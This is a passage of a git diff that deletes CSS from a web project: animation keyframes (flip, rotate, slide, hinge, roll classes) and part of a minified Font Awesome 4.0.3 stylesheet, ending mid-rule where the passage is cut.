flipInX { - 0% { - -webkit-transform: perspective(400px) rotateX(90deg); - transform: perspective(400px) rotateX(90deg); - opacity: 0; - } - - 40% { - -webkit-transform: perspective(400px) rotateX(-10deg); - transform: perspective(400px) rotateX(-10deg); - } - - 70% { - -webkit-transform: perspective(400px) rotateX(10deg); - transform: perspective(400px) rotateX(10deg); - } - - 100% { - -webkit-transform: perspective(400px) rotateX(0deg); - transform: perspective(400px) rotateX(0deg); - opacity: 1; - } -} - -@keyframes flipInX { - 0% { - -webkit-transform: perspective(400px) rotateX(90deg); - -ms-transform: perspective(400px) rotateX(90deg); - transform: perspective(400px) rotateX(90deg); - opacity: 0; - } - - 40% { - -webkit-transform: perspective(400px) rotateX(-10deg); - -ms-transform: perspective(400px) rotateX(-10deg); - transform: perspective(400px) rotateX(-10deg); - } - - 70% { - -webkit-transform: perspective(400px) rotateX(10deg); - -ms-transform: perspective(400px) rotateX(10deg); - transform: perspective(400px) rotateX(10deg); - } - - 100% { - -webkit-transform: perspective(400px) rotateX(0deg); - -ms-transform: perspective(400px) rotateX(0deg); - transform: perspective(400px) rotateX(0deg); - opacity: 1; - } -} - -.flipInX { - -webkit-backface-visibility: visible !important; - -ms-backface-visibility: visible !important; - backface-visibility: visible !important; - -webkit-animation-name: flipInX; - animation-name: flipInX; -} - -@-webkit-keyframes flipInY { - 0% { - -webkit-transform: perspective(400px) rotateY(90deg); - transform: perspective(400px) rotateY(90deg); - opacity: 0; - } - - 40% { - -webkit-transform: perspective(400px) rotateY(-10deg); - transform: perspective(400px) rotateY(-10deg); - } - - 70% { - -webkit-transform: perspective(400px) rotateY(10deg); - transform: perspective(400px) rotateY(10deg); - } - - 100% { - -webkit-transform: perspective(400px) rotateY(0deg); - transform: perspective(400px) rotateY(0deg); - opacity: 1; - } -} - 
-@keyframes flipInY { - 0% { - -webkit-transform: perspective(400px) rotateY(90deg); - -ms-transform: perspective(400px) rotateY(90deg); - transform: perspective(400px) rotateY(90deg); - opacity: 0; - } - - 40% { - -webkit-transform: perspective(400px) rotateY(-10deg); - -ms-transform: perspective(400px) rotateY(-10deg); - transform: perspective(400px) rotateY(-10deg); - } - - 70% { - -webkit-transform: perspective(400px) rotateY(10deg); - -ms-transform: perspective(400px) rotateY(10deg); - transform: perspective(400px) rotateY(10deg); - } - - 100% { - -webkit-transform: perspective(400px) rotateY(0deg); - -ms-transform: perspective(400px) rotateY(0deg); - transform: perspective(400px) rotateY(0deg); - opacity: 1; - } -} - -.flipInY { - -webkit-backface-visibility: visible !important; - -ms-backface-visibility: visible !important; - backface-visibility: visible !important; - -webkit-animation-name: flipInY; - animation-name: flipInY; -} - -@-webkit-keyframes flipOutX { - 0% { - -webkit-transform: perspective(400px) rotateX(0deg); - transform: perspective(400px) rotateX(0deg); - opacity: 1; - } - - 100% { - -webkit-transform: perspective(400px) rotateX(90deg); - transform: perspective(400px) rotateX(90deg); - opacity: 0; - } -} - -@keyframes flipOutX { - 0% { - -webkit-transform: perspective(400px) rotateX(0deg); - -ms-transform: perspective(400px) rotateX(0deg); - transform: perspective(400px) rotateX(0deg); - opacity: 1; - } - - 100% { - -webkit-transform: perspective(400px) rotateX(90deg); - -ms-transform: perspective(400px) rotateX(90deg); - transform: perspective(400px) rotateX(90deg); - opacity: 0; - } -} - -.flipOutX { - -webkit-animation-name: flipOutX; - animation-name: flipOutX; - -webkit-backface-visibility: visible !important; - -ms-backface-visibility: visible !important; - backface-visibility: visible !important; -} - -@-webkit-keyframes flipOutY { - 0% { - -webkit-transform: perspective(400px) rotateY(0deg); - transform: perspective(400px) 
rotateY(0deg); - opacity: 1; - } - - 100% { - -webkit-transform: perspective(400px) rotateY(90deg); - transform: perspective(400px) rotateY(90deg); - opacity: 0; - } -} - -@keyframes flipOutY { - 0% { - -webkit-transform: perspective(400px) rotateY(0deg); - -ms-transform: perspective(400px) rotateY(0deg); - transform: perspective(400px) rotateY(0deg); - opacity: 1; - } - - 100% { - -webkit-transform: perspective(400px) rotateY(90deg); - -ms-transform: perspective(400px) rotateY(90deg); - transform: perspective(400px) rotateY(90deg); - opacity: 0; - } -} - -.flipOutY { - -webkit-backface-visibility: visible !important; - -ms-backface-visibility: visible !important; - backface-visibility: visible !important; - -webkit-animation-name: flipOutY; - animation-name: flipOutY; -} - -@-webkit-keyframes lightSpeedIn { - 0% { - -webkit-transform: translateX(100%) skewX(-30deg); - transform: translateX(100%) skewX(-30deg); - opacity: 0; - } - - 60% { - -webkit-transform: translateX(-20%) skewX(30deg); - transform: translateX(-20%) skewX(30deg); - opacity: 1; - } - - 80% { - -webkit-transform: translateX(0%) skewX(-15deg); - transform: translateX(0%) skewX(-15deg); - opacity: 1; - } - - 100% { - -webkit-transform: translateX(0%) skewX(0deg); - transform: translateX(0%) skewX(0deg); - opacity: 1; - } -} - -@keyframes lightSpeedIn { - 0% { - -webkit-transform: translateX(100%) skewX(-30deg); - -ms-transform: translateX(100%) skewX(-30deg); - transform: translateX(100%) skewX(-30deg); - opacity: 0; - } - - 60% { - -webkit-transform: translateX(-20%) skewX(30deg); - -ms-transform: translateX(-20%) skewX(30deg); - transform: translateX(-20%) skewX(30deg); - opacity: 1; - } - - 80% { - -webkit-transform: translateX(0%) skewX(-15deg); - -ms-transform: translateX(0%) skewX(-15deg); - transform: translateX(0%) skewX(-15deg); - opacity: 1; - } - - 100% { - -webkit-transform: translateX(0%) skewX(0deg); - -ms-transform: translateX(0%) skewX(0deg); - transform: translateX(0%) skewX(0deg); 
- opacity: 1; - } -} - -.lightSpeedIn { - -webkit-animation-name: lightSpeedIn; - animation-name: lightSpeedIn; - -webkit-animation-timing-function: ease-out; - animation-timing-function: ease-out; -} - -@-webkit-keyframes lightSpeedOut { - 0% { - -webkit-transform: translateX(0%) skewX(0deg); - transform: translateX(0%) skewX(0deg); - opacity: 1; - } - - 100% { - -webkit-transform: translateX(100%) skewX(-30deg); - transform: translateX(100%) skewX(-30deg); - opacity: 0; - } -} - -@keyframes lightSpeedOut { - 0% { - -webkit-transform: translateX(0%) skewX(0deg); - -ms-transform: translateX(0%) skewX(0deg); - transform: translateX(0%) skewX(0deg); - opacity: 1; - } - - 100% { - -webkit-transform: translateX(100%) skewX(-30deg); - -ms-transform: translateX(100%) skewX(-30deg); - transform: translateX(100%) skewX(-30deg); - opacity: 0; - } -} - -.lightSpeedOut { - -webkit-animation-name: lightSpeedOut; - animation-name: lightSpeedOut; - -webkit-animation-timing-function: ease-in; - animation-timing-function: ease-in; -} - -@-webkit-keyframes rotateIn { - 0% { - -webkit-transform-origin: center center; - transform-origin: center center; - -webkit-transform: rotate(-200deg); - transform: rotate(-200deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: center center; - transform-origin: center center; - -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -@keyframes rotateIn { - 0% { - -webkit-transform-origin: center center; - -ms-transform-origin: center center; - transform-origin: center center; - -webkit-transform: rotate(-200deg); - -ms-transform: rotate(-200deg); - transform: rotate(-200deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: center center; - -ms-transform-origin: center center; - transform-origin: center center; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -.rotateIn { - -webkit-animation-name: rotateIn; - animation-name: rotateIn; -} - 
-@-webkit-keyframes rotateInDownLeft { - 0% { - -webkit-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(-90deg); - transform: rotate(-90deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -@keyframes rotateInDownLeft { - 0% { - -webkit-transform-origin: left bottom; - -ms-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(-90deg); - -ms-transform: rotate(-90deg); - transform: rotate(-90deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: left bottom; - -ms-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -.rotateInDownLeft { - -webkit-animation-name: rotateInDownLeft; - animation-name: rotateInDownLeft; -} - -@-webkit-keyframes rotateInDownRight { - 0% { - -webkit-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(90deg); - transform: rotate(90deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -@keyframes rotateInDownRight { - 0% { - -webkit-transform-origin: right bottom; - -ms-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(90deg); - -ms-transform: rotate(90deg); - transform: rotate(90deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: right bottom; - -ms-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -.rotateInDownRight { - -webkit-animation-name: rotateInDownRight; - animation-name: rotateInDownRight; -} - -@-webkit-keyframes rotateInUpLeft { - 0% { - 
-webkit-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(90deg); - transform: rotate(90deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -@keyframes rotateInUpLeft { - 0% { - -webkit-transform-origin: left bottom; - -ms-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(90deg); - -ms-transform: rotate(90deg); - transform: rotate(90deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: left bottom; - -ms-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -.rotateInUpLeft { - -webkit-animation-name: rotateInUpLeft; - animation-name: rotateInUpLeft; -} - -@-webkit-keyframes rotateInUpRight { - 0% { - -webkit-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(-90deg); - transform: rotate(-90deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -@keyframes rotateInUpRight { - 0% { - -webkit-transform-origin: right bottom; - -ms-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(-90deg); - -ms-transform: rotate(-90deg); - transform: rotate(-90deg); - opacity: 0; - } - - 100% { - -webkit-transform-origin: right bottom; - -ms-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } -} - -.rotateInUpRight { - -webkit-animation-name: rotateInUpRight; - animation-name: rotateInUpRight; -} - -@-webkit-keyframes rotateOut { - 0% { - -webkit-transform-origin: center center; - transform-origin: center center; 
- -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } - - 100% { - -webkit-transform-origin: center center; - transform-origin: center center; - -webkit-transform: rotate(200deg); - transform: rotate(200deg); - opacity: 0; - } -} - -@keyframes rotateOut { - 0% { - -webkit-transform-origin: center center; - -ms-transform-origin: center center; - transform-origin: center center; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } - - 100% { - -webkit-transform-origin: center center; - -ms-transform-origin: center center; - transform-origin: center center; - -webkit-transform: rotate(200deg); - -ms-transform: rotate(200deg); - transform: rotate(200deg); - opacity: 0; - } -} - -.rotateOut { - -webkit-animation-name: rotateOut; - animation-name: rotateOut; -} - -@-webkit-keyframes rotateOutDownLeft { - 0% { - -webkit-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } - - 100% { - -webkit-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(90deg); - transform: rotate(90deg); - opacity: 0; - } -} - -@keyframes rotateOutDownLeft { - 0% { - -webkit-transform-origin: left bottom; - -ms-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } - - 100% { - -webkit-transform-origin: left bottom; - -ms-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(90deg); - -ms-transform: rotate(90deg); - transform: rotate(90deg); - opacity: 0; - } -} - -.rotateOutDownLeft { - -webkit-animation-name: rotateOutDownLeft; - animation-name: rotateOutDownLeft; -} - -@-webkit-keyframes rotateOutDownRight { - 0% { - -webkit-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; 
- } - - 100% { - -webkit-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(-90deg); - transform: rotate(-90deg); - opacity: 0; - } -} - -@keyframes rotateOutDownRight { - 0% { - -webkit-transform-origin: right bottom; - -ms-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } - - 100% { - -webkit-transform-origin: right bottom; - -ms-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(-90deg); - -ms-transform: rotate(-90deg); - transform: rotate(-90deg); - opacity: 0; - } -} - -.rotateOutDownRight { - -webkit-animation-name: rotateOutDownRight; - animation-name: rotateOutDownRight; -} - -@-webkit-keyframes rotateOutUpLeft { - 0% { - -webkit-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } - - 100% { - -webkit-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(-90deg); - transform: rotate(-90deg); - opacity: 0; - } -} - -@keyframes rotateOutUpLeft { - 0% { - -webkit-transform-origin: left bottom; - -ms-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } - - 100% { - -webkit-transform-origin: left bottom; - -ms-transform-origin: left bottom; - transform-origin: left bottom; - -webkit-transform: rotate(-90deg); - -ms-transform: rotate(-90deg); - transform: rotate(-90deg); - opacity: 0; - } -} - -.rotateOutUpLeft { - -webkit-animation-name: rotateOutUpLeft; - animation-name: rotateOutUpLeft; -} - -@-webkit-keyframes rotateOutUpRight { - 0% { - -webkit-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } - - 100% { - -webkit-transform-origin: right 
bottom; - transform-origin: right bottom; - -webkit-transform: rotate(90deg); - transform: rotate(90deg); - opacity: 0; - } -} - -@keyframes rotateOutUpRight { - 0% { - -webkit-transform-origin: right bottom; - -ms-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - opacity: 1; - } - - 100% { - -webkit-transform-origin: right bottom; - -ms-transform-origin: right bottom; - transform-origin: right bottom; - -webkit-transform: rotate(90deg); - -ms-transform: rotate(90deg); - transform: rotate(90deg); - opacity: 0; - } -} - -.rotateOutUpRight { - -webkit-animation-name: rotateOutUpRight; - animation-name: rotateOutUpRight; -} - -@-webkit-keyframes slideInDown { - 0% { - opacity: 0; - -webkit-transform: translateY(-2000px); - transform: translateY(-2000px); - } - - 100% { - -webkit-transform: translateY(0); - transform: translateY(0); - } -} - -@keyframes slideInDown { - 0% { - opacity: 0; - -webkit-transform: translateY(-2000px); - -ms-transform: translateY(-2000px); - transform: translateY(-2000px); - } - - 100% { - -webkit-transform: translateY(0); - -ms-transform: translateY(0); - transform: translateY(0); - } -} - -.slideInDown { - -webkit-animation-name: slideInDown; - animation-name: slideInDown; -} - -@-webkit-keyframes slideInLeft { - 0% { - opacity: 0; - -webkit-transform: translateX(-2000px); - transform: translateX(-2000px); - } - - 100% { - -webkit-transform: translateX(0); - transform: translateX(0); - } -} - -@keyframes slideInLeft { - 0% { - opacity: 0; - -webkit-transform: translateX(-2000px); - -ms-transform: translateX(-2000px); - transform: translateX(-2000px); - } - - 100% { - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } -} - -.slideInLeft { - -webkit-animation-name: slideInLeft; - animation-name: slideInLeft; -} - -@-webkit-keyframes slideInRight { - 0% { - opacity: 0; - -webkit-transform: 
translateX(2000px); - transform: translateX(2000px); - } - - 100% { - -webkit-transform: translateX(0); - transform: translateX(0); - } -} - -@keyframes slideInRight { - 0% { - opacity: 0; - -webkit-transform: translateX(2000px); - -ms-transform: translateX(2000px); - transform: translateX(2000px); - } - - 100% { - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } -} - -.slideInRight { - -webkit-animation-name: slideInRight; - animation-name: slideInRight; -} - -@-webkit-keyframes slideOutLeft { - 0% { - -webkit-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(-2000px); - transform: translateX(-2000px); - } -} - -@keyframes slideOutLeft { - 0% { - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(-2000px); - -ms-transform: translateX(-2000px); - transform: translateX(-2000px); - } -} - -.slideOutLeft { - -webkit-animation-name: slideOutLeft; - animation-name: slideOutLeft; -} - -@-webkit-keyframes slideOutRight { - 0% { - -webkit-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(2000px); - transform: translateX(2000px); - } -} - -@keyframes slideOutRight { - 0% { - -webkit-transform: translateX(0); - -ms-transform: translateX(0); - transform: translateX(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateX(2000px); - -ms-transform: translateX(2000px); - transform: translateX(2000px); - } -} - -.slideOutRight { - -webkit-animation-name: slideOutRight; - animation-name: slideOutRight; -} - -@-webkit-keyframes slideOutUp { - 0% { - -webkit-transform: translateY(0); - transform: translateY(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(-2000px); - transform: translateY(-2000px); - } -} - -@keyframes slideOutUp { - 0% { - -webkit-transform: translateY(0); - 
-ms-transform: translateY(0); - transform: translateY(0); - } - - 100% { - opacity: 0; - -webkit-transform: translateY(-2000px); - -ms-transform: translateY(-2000px); - transform: translateY(-2000px); - } -} - -.slideOutUp { - -webkit-animation-name: slideOutUp; - animation-name: slideOutUp; -} - -@-webkit-keyframes hinge { - 0% { - -webkit-transform: rotate(0); - transform: rotate(0); - -webkit-transform-origin: top left; - transform-origin: top left; - -webkit-animation-timing-function: ease-in-out; - animation-timing-function: ease-in-out; - } - - 20%, 60% { - -webkit-transform: rotate(80deg); - transform: rotate(80deg); - -webkit-transform-origin: top left; - transform-origin: top left; - -webkit-animation-timing-function: ease-in-out; - animation-timing-function: ease-in-out; - } - - 40% { - -webkit-transform: rotate(60deg); - transform: rotate(60deg); - -webkit-transform-origin: top left; - transform-origin: top left; - -webkit-animation-timing-function: ease-in-out; - animation-timing-function: ease-in-out; - } - - 80% { - -webkit-transform: rotate(60deg) translateY(0); - transform: rotate(60deg) translateY(0); - opacity: 1; - -webkit-transform-origin: top left; - transform-origin: top left; - -webkit-animation-timing-function: ease-in-out; - animation-timing-function: ease-in-out; - } - - 100% { - -webkit-transform: translateY(700px); - transform: translateY(700px); - opacity: 0; - } -} - -@keyframes hinge { - 0% { - -webkit-transform: rotate(0); - -ms-transform: rotate(0); - transform: rotate(0); - -webkit-transform-origin: top left; - -ms-transform-origin: top left; - transform-origin: top left; - -webkit-animation-timing-function: ease-in-out; - animation-timing-function: ease-in-out; - } - - 20%, 60% { - -webkit-transform: rotate(80deg); - -ms-transform: rotate(80deg); - transform: rotate(80deg); - -webkit-transform-origin: top left; - -ms-transform-origin: top left; - transform-origin: top left; - -webkit-animation-timing-function: ease-in-out; - 
animation-timing-function: ease-in-out; - } - - 40% { - -webkit-transform: rotate(60deg); - -ms-transform: rotate(60deg); - transform: rotate(60deg); - -webkit-transform-origin: top left; - -ms-transform-origin: top left; - transform-origin: top left; - -webkit-animation-timing-function: ease-in-out; - animation-timing-function: ease-in-out; - } - - 80% { - -webkit-transform: rotate(60deg) translateY(0); - -ms-transform: rotate(60deg) translateY(0); - transform: rotate(60deg) translateY(0); - opacity: 1; - -webkit-transform-origin: top left; - -ms-transform-origin: top left; - transform-origin: top left; - -webkit-animation-timing-function: ease-in-out; - animation-timing-function: ease-in-out; - } - - 100% { - -webkit-transform: translateY(700px); - -ms-transform: translateY(700px); - transform: translateY(700px); - opacity: 0; - } -} - -.hinge { - -webkit-animation-name: hinge; - animation-name: hinge; -} - -/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */ - -@-webkit-keyframes rollIn { - 0% { - opacity: 0; - -webkit-transform: translateX(-100%) rotate(-120deg); - transform: translateX(-100%) rotate(-120deg); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0px) rotate(0deg); - transform: translateX(0px) rotate(0deg); - } -} - -@keyframes rollIn { - 0% { - opacity: 0; - -webkit-transform: translateX(-100%) rotate(-120deg); - -ms-transform: translateX(-100%) rotate(-120deg); - transform: translateX(-100%) rotate(-120deg); - } - - 100% { - opacity: 1; - -webkit-transform: translateX(0px) rotate(0deg); - -ms-transform: translateX(0px) rotate(0deg); - transform: translateX(0px) rotate(0deg); - } -} - -.rollIn { - -webkit-animation-name: rollIn; - animation-name: rollIn; -} - -/* originally authored by Nick Pettit - https://github.com/nickpettit/glide */ - -@-webkit-keyframes rollOut { - 0% { - opacity: 1; - -webkit-transform: translateX(0px) rotate(0deg); - transform: translateX(0px) rotate(0deg); - } - - 100% { - opacity: 0; 
- -webkit-transform: translateX(100%) rotate(120deg);
- transform: translateX(100%) rotate(120deg);
- }
-}
-
-@keyframes rollOut {
- 0% {
- opacity: 1;
- -webkit-transform: translateX(0px) rotate(0deg);
- -ms-transform: translateX(0px) rotate(0deg);
- transform: translateX(0px) rotate(0deg);
- }
-
- 100% {
- opacity: 0;
- -webkit-transform: translateX(100%) rotate(120deg);
- -ms-transform: translateX(100%) rotate(120deg);
- transform: translateX(100%) rotate(120deg);
- }
-}
-
-.rollOut {
- -webkit-animation-name: rollOut;
- animation-name: rollOut;
-}
\ No newline at end of file
diff --git a/newDesign/assets/css/font-awesome.min.css b/newDesign/assets/css/font-awesome.min.css
deleted file mode 100644
index 449d6ac55..000000000
--- a/newDesign/assets/css/font-awesome.min.css
+++ /dev/null
@@ -1,4 +0,0 @@ -/*! - * Font Awesome 4.0.3 by @davegandy - http://fontawesome.io - @fontawesome - * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) - */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.0.3');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.0.3') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff?v=4.0.3') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.0.3') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.0.3#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font-family:FontAwesome;font-style:normal;font-weight:normal;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.3333333333333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.2857142857142858em;text-align:center}.fa-ul{padding-left:0;margin-left:2.142857142857143em;list-style-type:none}.fa-ul>li{position:relative}.fa-li{position:absolute;left:-2.142857142857143em;width:2.142857142857143em;top:.14285714285714285em;text-align:center}.fa-li.fa-lg{left:-1.8571428571428572em}.fa-border{padding:.2em .25em .15em;border:solid .08em #eee;border-radius:.1em}.pull-right{float:right}.pull-left{float:left}.fa.pull-left{margin-right:.3em}.fa.pull-right{margin-left:.3em}.fa-spin{-webkit-animation:spin 2s infinite linear;-moz-animation:spin 2s infinite linear;-o-animation:spin 2s infinite linear;animation:spin 2s infinite linear}@-moz-keyframes spin{0%{-moz-transform:rotate(0deg)}100%{-moz-transform:rotate(359deg)}}@-webkit-keyframes spin{0%{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg)}}@-o-keyframes spin{0%{-o-transform:rotate(0deg)}100%{-o-transform:rotate(359deg)}}@-ms-keyframes spin{0%{-ms-transform:rotate(0deg)}100%{-ms-transform:rotate(359deg)}}@keyframes 
spin{0%{transform:rotate(0deg)}100%{transform:rotate(359deg)}}.fa-rotate-90{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=1);-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);-o-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=2);-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-ms-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=3);-webkit-transform:rotate(270deg);-moz-transform:rotate(270deg);-ms-transform:rotate(270deg);-o-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=0,mirror=1);-webkit-transform:scale(-1,1);-moz-transform:scale(-1,1);-ms-transform:scale(-1,1);-o-transform:scale(-1,1);transform:scale(-1,1)}.fa-flip-vertical{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=2,mirror=1);-webkit-transform:scale(1,-1);-moz-transform:scale(1,-1);-ms-transform:scale(1,-1);-o-transform:scale(1,-1);transform:scale(1,-1)}.fa-stack{position:relative;display:inline-block;width:2em;height:2em;line-height:2em;vertical-align:middle}.fa-stack-1x,.fa-stack-2x{position:absolute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002"}.fa-envelope-o:before{content:"\f003"}.fa-heart:before{content:"\f004"}.fa-star:before{content:"\f005"}.fa-star-o:before{content:"\f006"}.fa-user:before{content:"\f007"}.fa-film:before{content:"\f008"}.fa-th-large:before{content:"\f009"}.fa-th:before{content:"\f00a"}.fa-th-list:before{content:"\f00b"}.fa-check:before{content:"\f00c"}.fa-times:before{content:"\f00d"}.fa-search-plus:before{content:"\f00e"}.fa-search-minus:before{content:"\f010"}.fa-power-
off:before{content:"\f011"}.fa-signal:before{content:"\f012"}.fa-gear:before,.fa-cog:before{content:"\f013"}.fa-trash-o:before{content:"\f014"}.fa-home:before{content:"\f015"}.fa-file-o:before{content:"\f016"}.fa-clock-o:before{content:"\f017"}.fa-road:before{content:"\f018"}.fa-download:before{content:"\f019"}.fa-arrow-circle-o-down:before{content:"\f01a"}.fa-arrow-circle-o-up:before{content:"\f01b"}.fa-inbox:before{content:"\f01c"}.fa-play-circle-o:before{content:"\f01d"}.fa-rotate-right:before,.fa-repeat:before{content:"\f01e"}.fa-refresh:before{content:"\f021"}.fa-list-alt:before{content:"\f022"}.fa-lock:before{content:"\f023"}.fa-flag:before{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before{content:"\f02a"}.fa-tag:before{content:"\f02b"}.fa-tags:before{content:"\f02c"}.fa-book:before{content:"\f02d"}.fa-bookmark:before{content:"\f02e"}.fa-print:before{content:"\f02f"}.fa-camera:before{content:"\f030"}.fa-font:before{content:"\f031"}.fa-bold:before{content:"\f032"}.fa-italic:before{content:"\f033"}.fa-text-height:before{content:"\f034"}.fa-text-width:before{content:"\f035"}.fa-align-left:before{content:"\f036"}.fa-align-center:before{content:"\f037"}.fa-align-right:before{content:"\f038"}.fa-align-justify:before{content:"\f039"}.fa-list:before{content:"\f03a"}.fa-dedent:before,.fa-outdent:before{content:"\f03b"}.fa-indent:before{content:"\f03c"}.fa-video-camera:before{content:"\f03d"}.fa-picture-o:before{content:"\f03e"}.fa-pencil:before{content:"\f040"}.fa-map-marker:before{content:"\f041"}.fa-adjust:before{content:"\f042"}.fa-tint:before{content:"\f043"}.fa-edit:before,.fa-pencil-square-o:before{content:"\f044"}.fa-share-square-o:before{content:"\f045"}.fa-check-square-o:before{content:"\f046"}.fa-arrows:before{content:"\f047"}.fa-step-backward:before{content:"\f048"}.fa-fast-backward:before{
content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{content:"\f050"}.fa-step-forward:before{content:"\f051"}.fa-eject:before{content:"\f052"}.fa-chevron-left:before{content:"\f053"}.fa-chevron-right:before{content:"\f054"}.fa-plus-circle:before{content:"\f055"}.fa-minus-circle:before{content:"\f056"}.fa-times-circle:before{content:"\f057"}.fa-check-circle:before{content:"\f058"}.fa-question-circle:before{content:"\f059"}.fa-info-circle:before{content:"\f05a"}.fa-crosshairs:before{content:"\f05b"}.fa-times-circle-o:before{content:"\f05c"}.fa-check-circle-o:before{content:"\f05d"}.fa-ban:before{content:"\f05e"}.fa-arrow-left:before{content:"\f060"}.fa-arrow-right:before{content:"\f061"}.fa-arrow-up:before{content:"\f062"}.fa-arrow-down:before{content:"\f063"}.fa-mail-forward:before,.fa-share:before{content:"\f064"}.fa-expand:before{content:"\f065"}.fa-compress:before{content:"\f066"}.fa-plus:before{content:"\f067"}.fa-minus:before{content:"\f068"}.fa-asterisk:before{content:"\f069"}.fa-exclamation-circle:before{conte